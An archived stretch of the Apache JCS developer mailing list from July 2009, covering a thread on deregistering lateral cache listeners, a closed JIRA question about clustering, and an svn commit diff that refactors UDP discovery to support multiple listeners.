SMTP; 20 Jul 2009 21:04:24 -0000 Received: (qmail 55323 invoked by uid 500); 20 Jul 2009 21:05:29 -0000 Delivered-To: [email protected] Received: (qmail 55271 invoked by uid 500); 20 Jul 2009 21:05:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 55261 invoked by uid 99); 20 Jul 2009 21:05:29 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Jul 2009 21:05:29 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO kuber.nabble.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Jul 2009 21:05:18 +0000 Received: from isper.nabble.com ([161.129.204.104]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from <[email protected]>) id 1MT02a-0001q3-O1 for [email protected]; Mon, 20 Jul 2009 14:04:57 -0700 Message-ID: <[email protected]> Date: Mon, 20 Jul 2009 14:04:56 -0700 (PDT) From: Andrei Povodyrev <[email protected]> To: [email protected] Subject: Re: How to deregister Lateral Cache listeners in cluster? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Nabble-From: [email protected] References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Thank you for clarification Aaron. Though I wished Lateral cache behaved a bit differently: When LateralTCPSender fails to send a message to another node in cluster it might try to reset the socket in case the failed node is back. If it fails again when remove the sender/listener pair for the failed node from its list. When the failed node comes back the connections will be created again= . In this scenario LateralCacheMonitor, responsible for connection recovery i= s not needed. Andrei. Aaron Smuts wrote: >=20 >=20 > The discovery system needs to deregister after a period of inactivity. = =20 >=20 > The remote cache client queues items during the reconnect period. It wil= l > send them once reconnected. This isn't as easy to do in the lateral. =20 >=20 > Aaron >=20 > --- On Mon, 7/6/09, Andrei Povodyrev <[email protected]> wrote: >=20 >> From: Andrei Povodyrev <[email protected]> >> Subject: How to deregister Lateral Cache listeners in cluster? >> To: [email protected] >> Date: Monday, July 6, 2009, 11:10 PM >>=20 >>=20 >>=20 >> I am using Lateral Cache with Lateral Cache with UDP >> discovery. When a node >> in cluster goes down the other nodes do not discard their >> senders >> (LateralTCPSender) for the node. Is there way to remove >> them? >> Calling CompositeCacheManager.shutDown() on the node does >> not help >>=20 >> I am wondering why this behavior was programmed this way. >> Would it be better >> to recreate the senders/listeners when the node again joins >> the cluster via >> UDP discovery? >>=20 >> The current implementation presents me with a risk of >> losing cache events as >> the object stream oos in LateralTCPSender is closed anyway >> and first attempt >> to send fails (EVEN when the node is back). >> After failure is detected the sender is recreated by >> LateralCacheMonitor >> which >> =C2=A0 *operates in a failure driven mode. That is, >> * it goes into a wait state until there is an error. Upon >> the notification >> of a >> * connection error, the monitor changes to operate in a >> time driven mode. >> That >> * is, it attempts to recover the connections on a periodic >> basis. When all >> * failed connections are restored, it changes back to the >> failure driven >> mode >>=20 >> All consecutive sends will be fine but the first one will >> not get through. I >> consider this to be a SEVERE case. >>=20 >> Is there any trick I missed? >>=20 >> Thank you very much for your help >> --=20 >> View this message in context: >> http://www.nabble.com/How-to-deregister-Lateral-Cache-listeners-in-clust= er--tp24367699p24367699.html >> Sent from the JCS - Dev mailing list archive at >> Nabble.com. >>=20 >>=20 >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >>=20 >> >=20 > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] >=20 >=20 >=20 --=20 View this message in context: http://www.nabble.com/How-to-deregister-Later= al-Cache-listeners-in-cluster--tp24367699p24577542.html Sent from the JCS - Dev mailing list [email protected]. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 21 12:22:34 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98618 invoked from network); 21 Jul 2009 12:22:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 12:22:34 -0000 Received: (qmail 98093 invoked by uid 500); 21 Jul 2009 12:23:39 -0000 Delivered-To: [email protected] Received: (qmail 98044 invoked by uid 500); 21 Jul 2009 12:23:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 98030 invoked by uid 99); 21 Jul 2009 12:23:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 12:23:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 12:23:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id ECB41234C046 for <[email protected]>; Tue, 21 Jul 2009 05:23:14 -0700 (PDT) Message-ID: <1634053682.1248178994968.JavaMail.jira@brutus> Date: Tue, 21 Jul 2009 05:23:14 -0700 (PDT) From: "rushi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (JCS-63) Can we configure JCS to cluster across multiple boxes? MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Can we configure JCS to cluster across multiple boxes? ------------------------------------------------------ Key: JCS-63 URL: https://issues.apache.org/jira/browse/JCS-63 Project: JCS Issue Type: Question Components: Composite Cache, Indexed Disk Cache Affects Versions: jcs-1.3 Environment: UNIX,WAS6.1,JRE1.5 Reporter: rushi Assignee: Aaron Smuts Fix For: jcs-1.3 I am going to implement JCS in my Application. My application is deployed on WAS server and it runs on 2 clusters.Can we configure JCS to cluster across multiple boxes? If so, please let me know how to do the configuration for this. In the JCS documentation i could not find this info. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 21 14:06:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47195 invoked from network); 21 Jul 2009 14:06:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 14:06:31 -0000 Received: (qmail 39119 invoked by uid 500); 21 Jul 2009 14:07:37 -0000 Delivered-To: [email protected] Received: (qmail 39054 invoked by uid 500); 21 Jul 2009 14:07:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 39044 invoked by uid 99); 21 Jul 2009 14:07:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 14:07:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 14:07:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id CADE9234C044 for <[email protected]>; Tue, 21 Jul 2009 07:07:14 -0700 (PDT) Message-ID: <876271444.1248185234816.JavaMail.jira@brutus> Date: Tue, 21 Jul 2009 07:07:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-63) Can we configure JCS to cluster across multiple boxes? In-Reply-To: <1634053682.1248178994968.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-63?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-63. -------------------------- Resolution: Fixed It's better to simply mail the user mailing list with questions like this. Also, you should read the docs. It all depends on what you mean by "Cluster." Read the docs and then send a message to the user's mailing list. Thanks. > Can we configure JCS to cluster across multiple boxes? > ------------------------------------------------------ > > Key: JCS-63 > URL: https://issues.apache.org/jira/browse/JCS-63 > Project: JCS > Issue Type: Question > Components: Composite Cache, Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: UNIX,WAS6.1,JRE1.5 > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > > I am going to implement JCS in my Application. My application is deployed on WAS server and it runs on 2 clusters.Can we configure JCS to cluster across multiple boxes? If so, please let me know how to do the configuration for this. In the JCS documentation i could not find this info. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 21 18:59:45 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89268 invoked from network); 21 Jul 2009 18:59:45 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Jul 2009 18:59:45 -0000 Received: (qmail 51937 invoked by uid 500); 21 Jul 2009 19:00:50 -0000 Delivered-To: [email protected] Received: (qmail 51911 invoked by uid 500); 21 Jul 2009 19:00:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51901 invoked by uid 500); 21 Jul 2009 19:00:50 -0000 Delivered-To: [email protected] Received: (qmail 51898 invoked by uid 500); 21 Jul 2009 19:00:50 -0000 Delivered-To: [email protected] Received: (qmail 51799 invoked by uid 99); 21 Jul 2009 19:00:45 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 19:00:45 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Jul 2009 19:00:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8D5A8238890C; Tue, 21 Jul 2009 19:00:12 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r796476 - in /jakarta/jcs/trunk/src: java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/utils/discovery/ test/org/apache/jcs/utils/discovery/ Date: Tue, 21 Jul 2009 19:00:12 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Tue Jul 21 19:00:11 2009 New Revision: 796476 URL: http://svn.apache.org/viewvc?rev=796476&view=rev Log: Moving UDP discovery out of the tcp lateral package. I'm making something that can be used by other auxiliaries. I'm not finished yet. Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java Tue Jul 21 19:00:11 2009 @@ -168,19 +168,23 @@ // create the UDP discovery for the TCP lateral if ( lac.isUdpDiscoveryEnabled() ) { - LateralTCPDiscoveryListener discoveryListener = new LateralTCPDiscoveryListener( cacheMgr, cacheEventLogger, - elementSerializer ); + // TODO this will create one for each region, but one can be used for all regions + LateralTCPDiscoveryListener discoveryListener = new LateralTCPDiscoveryListener( cacheMgr, + cacheEventLogger, + elementSerializer ); discoveryListener.addNoWaitFacade( lcnwf, lac.getCacheName() ); - + // need a factory for this so it doesn't // get dereferenced, also we don't want one for every region. - discovery = UDPDiscoveryManager.getInstance().getService( lac.getUdpDiscoveryAddr(), lac.getUdpDiscoveryPort(), lac.getTcpListenerPort(), cacheMgr, cacheEventLogger, - elementSerializer ); + discovery = UDPDiscoveryManager.getInstance().getService( lac.getUdpDiscoveryAddr(), + lac.getUdpDiscoveryPort(), + lac.getTcpListenerPort(), cacheMgr, + cacheEventLogger ); discovery.addParticipatingCacheName( lac.getCacheName() ); - discovery.setDiscoveryListener( discoveryListener ); - + discovery.addDiscoveryListener( discoveryListener ); + if ( log.isInfoEnabled() ) { log.info( "Created UDPDiscoveryService for TCP lateral cache." ); Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java Tue Jul 21 19:00:11 2009 @@ -18,7 +18,11 @@ import org.apache.jcs.utils.discovery.DiscoveredService; import org.apache.jcs.utils.discovery.behavior.IDiscoveryListener; -/** This knows how to add and remove discovered services. */ +/** + * This knows how to add and remove discovered services. + * <p> + * We can have one listener per region, or one shared by all regions. + */ public class LateralTCPDiscoveryListener implements IDiscoveryListener { @@ -80,6 +84,9 @@ * message, the add no wait will be called here. To add a no wait, the facade is looked up for * this cache name. * <p> + * Each region has a facade. The facade contains a list of end points--the other tcp lateral + * services. + * <p> * @param noWait */ protected void addNoWait( LateralCacheNoWait noWait ) @@ -150,11 +157,7 @@ // get a cache and add it to the no waits // the add method should not add the same. // we need the listener port from the original config. - ITCPLateralCacheAttributes lca = new TCPLateralCacheAttributes(); - lca.setTransmissionType( LateralCacheAttributes.TCP ); - lca.setTcpServer( service.getServiceAddress() + ":" + service.getServicePort() ); - LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, - elementSerializer ); + LateralTCPCacheManager lcm = findManagerForServiceEndPoint( service ); ArrayList regions = service.getCacheNames(); if ( regions != null ) @@ -180,7 +183,7 @@ addNoWait( (LateralCacheNoWait) ic ); if ( log.isDebugEnabled() ) { - log.debug( "Called addNoWait for cacheName " + cacheName ); + log.debug( "Called addNoWait for cacheName [" + cacheName + "]" ); } } } @@ -189,7 +192,6 @@ log.error( "Problem creating no wait", e ); } } - // end while } else { @@ -199,10 +201,69 @@ /** * Removes the lateral cache. + * <p> * @param service */ public void removeDiscoveredService( DiscoveredService service ) { - // TODO Auto-generated method stub + // get a cache and add it to the no waits + // the add method should not add the same. + // we need the listener port from the original config. + LateralTCPCacheManager lcm = findManagerForServiceEndPoint( service ); + + ArrayList regions = service.getCacheNames(); + if ( regions != null ) + { + // for each region get the cache + Iterator it = regions.iterator(); + while ( it.hasNext() ) + { + String cacheName = (String) it.next(); + + try + { + ICache ic = lcm.getCache( cacheName ); + + if ( log.isDebugEnabled() ) + { + log.debug( "Got cache, ic = " + ic ); + } + + // remove this to the nowaits for this cachename + if ( ic != null ) + { + removeNoWait( (LateralCacheNoWait) ic ); + if ( log.isDebugEnabled() ) + { + log.debug( "Called removeNoWait for cacheName [" + cacheName + "]" ); + } + } + } + catch ( Exception e ) + { + log.error( "Problem removing no wait", e ); + } + } + } + else + { + log.warn( "No cache names found in message " + service ); + } + } + + /** + * Gets the appropriate manager. + * <p> + * @param service + * @return LateralTCPCacheManager configured for that end point. + */ + private LateralTCPCacheManager findManagerForServiceEndPoint( DiscoveredService service ) + { + ITCPLateralCacheAttributes lca = new TCPLateralCacheAttributes(); + lca.setTransmissionType( LateralCacheAttributes.TCP ); + lca.setTcpServer( service.getServiceAddress() + ":" + service.getServicePort() ); + LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, + elementSerializer ); + return lcm; } } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java Tue Jul 21 19:00:11 2009 @@ -25,7 +25,6 @@ import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.apache.jcs.engine.behavior.ICompositeCacheManager; -import org.apache.jcs.engine.behavior.IElementSerializer; import org.apache.jcs.engine.behavior.IShutdownObservable; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; @@ -73,13 +72,11 @@ * @param servicePort * @param cacheMgr * @param cacheEventLogger - * @param elementSerializer * @return UDPDiscoveryService */ public synchronized UDPDiscoveryService getService( String discoveryAddress, int discoveryPort, int servicePort, ICompositeCacheManager cacheMgr, - ICacheEventLogger cacheEventLogger, - IElementSerializer elementSerializer ) + ICacheEventLogger cacheEventLogger ) { String key = discoveryAddress + ":" + discoveryPort + ":" + servicePort; @@ -97,6 +94,8 @@ attributes.setServicePort( servicePort ); service = new UDPDiscoveryService( attributes, cacheEventLogger ); + + // register for shutdown notification ( (IShutdownObservable) cacheMgr ).registerShutdownObserver( service ); services.put( key, service ); Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java Tue Jul 21 19:00:11 2009 @@ -28,7 +28,6 @@ import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; -import org.apache.jcs.auxiliary.lateral.LateralCacheInfo; import org.apache.jcs.engine.behavior.IShutdownObserver; import EDU.oswego.cs.dl.util.concurrent.BoundedBuffer; @@ -92,7 +91,7 @@ // create a small thread pool to handle a barrage pooledExecutor = new PooledExecutor( new BoundedBuffer( 100 ), maxPoolSize ); pooledExecutor.discardOldestWhenBlocked(); - pooledExecutor.setMinimumPoolSize(1); + //pooledExecutor.setMinimumPoolSize(1); pooledExecutor.setThreadFactory( new MyThreadFactory() ); if ( log.isInfoEnabled() ) @@ -125,11 +124,15 @@ try { mSocket = new MulticastSocket( multicastPort ); + if ( log.isInfoEnabled() ) + { + log.info( "Joining Group: [" + InetAddress.getByName( multicastAddressString ) + "]" ); + } mSocket.joinGroup( InetAddress.getByName( multicastAddressString ) ); } catch ( IOException e ) { - log.error( "Could not bind to multicast address [" + multicastAddressString + ":" + multicastPort + "]", e ); + log.error( "Could not bind to multicast address [" + InetAddress.getByName( multicastAddressString ) + ":" + multicastPort + "]", e ); throw e; } } @@ -149,6 +152,11 @@ Object obj = null; try { + if ( log.isDebugEnabled() ) + { + log.debug( "Waiting for message." ); + } + mSocket.receive( packet ); if ( log.isDebugEnabled() ) @@ -157,9 +165,7 @@ } final ByteArrayInputStream byteStream = new ByteArrayInputStream( mBuffer, 0, packet.getLength() ); - final ObjectInputStream objectStream = new ObjectInputStream( byteStream ); - obj = objectStream.readObject(); if ( log.isDebugEnabled() ) @@ -275,7 +281,7 @@ public void run() { // consider comparing ports here instead. - if ( message.getRequesterId() == LateralCacheInfo.listenerId ) + if ( message.getRequesterId() == UDPDiscoveryInfo.listenerId ) { if ( log.isDebugEnabled() ) { @@ -370,6 +376,7 @@ try { shutdown = true; + mSocket.leaveGroup( InetAddress.getByName( multicastAddressString ) ); mSocket.close(); pooledExecutor.shutdownNow(); } Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java Tue Jul 21 19:00:11 2009 @@ -21,7 +21,6 @@ import java.io.ByteArrayOutputStream; import java.io.IOException; -import java.io.ObjectOutputStream; import java.net.DatagramPacket; import java.net.InetAddress; import java.net.MulticastSocket; @@ -29,7 +28,7 @@ import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; -import org.apache.jcs.auxiliary.lateral.LateralCacheInfo; +import org.apache.jcs.utils.serialization.StandardSerializer; /** * This is a generic sender for the UDPDiscovery process. @@ -50,6 +49,9 @@ /** The port */ private int multicastPort; + /** Used to serialize messages */ + private StandardSerializer serializer = new StandardSerializer(); + /** * Constructor for the UDPDiscoverySender object * <p> @@ -69,8 +71,8 @@ if ( log.isInfoEnabled() ) { log.info( "Constructing socket for sender." ); - } - localSocket = new MulticastSocket(); + } + localSocket = new MulticastSocket( port ); // Remote address. multicastAddress = InetAddress.getByName( host ); @@ -137,25 +139,22 @@ if ( log.isDebugEnabled() ) { log.debug( "sending UDPDiscoveryMessage, address [" + multicastAddress + "], port [" + multicastPort - + "], message = " + message ); } + + "], message = " + message ); + } try { - // write the object to a byte array. - final MyByteArrayOutputStream byteStream = new MyByteArrayOutputStream(); - final ObjectOutputStream objectStream = new ObjectOutputStream( byteStream ); - objectStream.writeObject( message ); - objectStream.flush(); - final byte[] bytes = byteStream.getBytes(); + final byte[] bytes = serializer.serialize( message ); // put the byte array in a packet final DatagramPacket packet = new DatagramPacket( bytes, bytes.length, multicastAddress, multicastPort ); if ( log.isDebugEnabled() ) { - log.debug( "Sending DatagramPacket. bytes.length [" + bytes.length + "] to " + multicastAddress + ":" + multicastPort ); + log.debug( "Sending DatagramPacket. bytes.length [" + bytes.length + "] to " + multicastAddress + ":" + + multicastPort ); } - + localSocket.send( packet ); } catch ( IOException e ) @@ -186,7 +185,7 @@ } /** - * This sends a message broadcasting our that the host and port is available for connections. + * This sends a message broadcasting out that the host and port is available for connections. * <p> * It uses the vmid as the requesterDI * @param host @@ -197,7 +196,7 @@ public void passiveBroadcast( String host, int port, ArrayList cacheNames ) throws IOException { - passiveBroadcast( host, port, cacheNames, LateralCacheInfo.listenerId ); + passiveBroadcast( host, port, cacheNames, UDPDiscoveryInfo.listenerId ); } /** @@ -239,7 +238,7 @@ public void removeBroadcast( String host, int port, ArrayList cacheNames ) throws IOException { - removeBroadcast( host, port, cacheNames, LateralCacheInfo.listenerId ); + removeBroadcast( host, port, cacheNames, UDPDiscoveryInfo.listenerId ); } /** Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java Tue Jul 21 19:00:11 2009 @@ -21,6 +21,7 @@ import java.net.UnknownHostException; import java.util.ArrayList; +import java.util.HashSet; import java.util.Iterator; import java.util.Set; @@ -77,8 +78,8 @@ /** This a list of regions that are configured to use discovery. */ private Set cacheNames = new CopyOnWriteArraySet(); - /** handles add and remove. consider making into a set. */ - private IDiscoveryListener discoveryListener; + /** Set of listeners. */ + private Set discoveryListeners = new CopyOnWriteArraySet(); /** * @param attributes @@ -208,7 +209,12 @@ public void removeDiscoveredService( DiscoveredService service ) { getDiscoveredServices().remove( service ); - getDiscoveryListener().removeDiscoveredService( service ); + + Iterator it = getDiscoveryListeners().iterator(); + while ( it.hasNext() ) + { + ( (IDiscoveryListener) it.next() ).removeDiscoveredService( service ); + } } /** @@ -234,7 +240,11 @@ getDiscoveredServices().add( discoveredService ); // todo update some list of cachenames - getDiscoveryListener().addDiscoveredService( discoveredService ); + Iterator it = getDiscoveryListeners().iterator(); + while ( it.hasNext() ) + { + ( (IDiscoveryListener) it.next() ).addDiscoveredService( discoveredService ); + } } else { @@ -404,18 +414,42 @@ } /** - * @param discoveryListener the discoveryListener to set + * @return the discoveryListeners */ - public void setDiscoveryListener( IDiscoveryListener discoveryListener ) + private Set getDiscoveryListeners() { - this.discoveryListener = discoveryListener; + return discoveryListeners; } /** - * @return the discoveryListener + * @return the discoveryListeners + */ + public Set getCopyOfDiscoveryListeners() + { + Set copy = new HashSet(); + copy.addAll( getDiscoveryListeners() ); + return copy; + } + + /** + * Adds a listener. + * <p> + * @param listener + * @return true if it wasn't already in the set + */ + public boolean addDiscoveryListener( IDiscoveryListener listener ) + { + return getDiscoveryListeners().add( listener ); + } + + /** + * Removes a listener. + * <p> + * @param listener + * @return true if it was in the set */ - public IDiscoveryListener getDiscoveryListener() + public boolean removeDiscoveryListener( IDiscoveryListener listener ) { - return discoveryListener; + return getDiscoveryListeners().remove( listener ); } } Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java Tue Jul 21 19:00:11 2009 @@ -33,7 +33,7 @@ private static final String ADDRESS = "161.129.204.104"; /** multicast address to send/receive on */ - private static final int PORT = 5555; + private static final int PORT = 5556; /** imaginary host address for sending */ private static final String SENDING_HOST = "imaginary host address"; Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java?rev=796476&r1=796475&r2=796476&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Tue Jul 21 19:00:11 2009 @@ -46,7 +46,7 @@ service.addParticipatingCacheName( "testCache1" ); MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); - service.setDiscoveryListener( discoveryListener ); + service.addDiscoveryListener( discoveryListener ); DiscoveredService discoveredService = new DiscoveredService(); discoveredService.setServiceAddress( host ); @@ -80,7 +80,7 @@ service.addParticipatingCacheName( "testCache1" ); MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); - service.setDiscoveryListener( discoveryListener ); + service.addDiscoveryListener( discoveryListener ); DiscoveredService discoveredService = new DiscoveredService(); discoveredService.setServiceAddress( host ); @@ -135,7 +135,7 @@ 